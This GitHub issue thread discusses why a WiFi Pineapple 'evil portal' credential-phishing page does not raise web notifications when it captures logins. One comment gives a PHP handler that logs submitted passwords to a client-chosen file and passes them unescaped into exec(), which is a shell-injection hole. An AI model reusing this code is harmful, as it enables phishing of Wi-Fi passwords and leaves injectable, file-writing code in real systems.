### ISSUE TITLE
No web notification after attemp to log in

### ISSUE THREAD

**Issue by pdelteil** [kbeflo/evilportals#16]
Using the latest pineapple firmware (2.1) and latest evilportal. 

I tried the google portal, I found the credentials on the logs files (/sd/evilportal-logs) but nothing happened on the web UI.

**Comment by JediMasterX** [comment]
same, just have not checked in the log files...

**Comment by gerrogerro** [comment]
web notification edit your "MyPortal.php".

If you want for example being notified about the "$line" parameter, after the "file_put_contents etc.." string, add this:

exec("pineapple notify '$line' ");

before the "}"

You need to exec $line or $password , $email or whatever you want to be notified about.
Example:

public function handleAuthorization()
{
if(isset($_POST['password'])) {
$line = date('Y-m-d H:i:s') . " - " . $_POST["essid"] . " - " . $_POST['password'] . "\n";
file_put_contents($_POST["log"], $line, FILE_APPEND) or die("Could not set in log file");

       exec("pineapple notify '$line'");  
}

**Comment by pdelteil** [comment]
@gerrogerro Thanks for your answer. I thought notifications were working since the Readme info says it. 

![screenshot from 2018-06-21 10-33-07](https://user-images.githubusercontent.com/20244863/41725763-97832126-753e-11e8-8b1c-d8925a464aa2.png)

I will try your code.

**Comment by kbeflo** [comment]
There had been changes on the latest firmware as `exec("pineapple notify '$line'");` instead of creating new notifications on the web interface, it gets rejected with permission denied.

Will be using this instead `exec("notify '$line'");`, though I'm still having problems on EvilPortal development branch 91f9778 not serving the portals properly on the latest firmware 2.1.2.
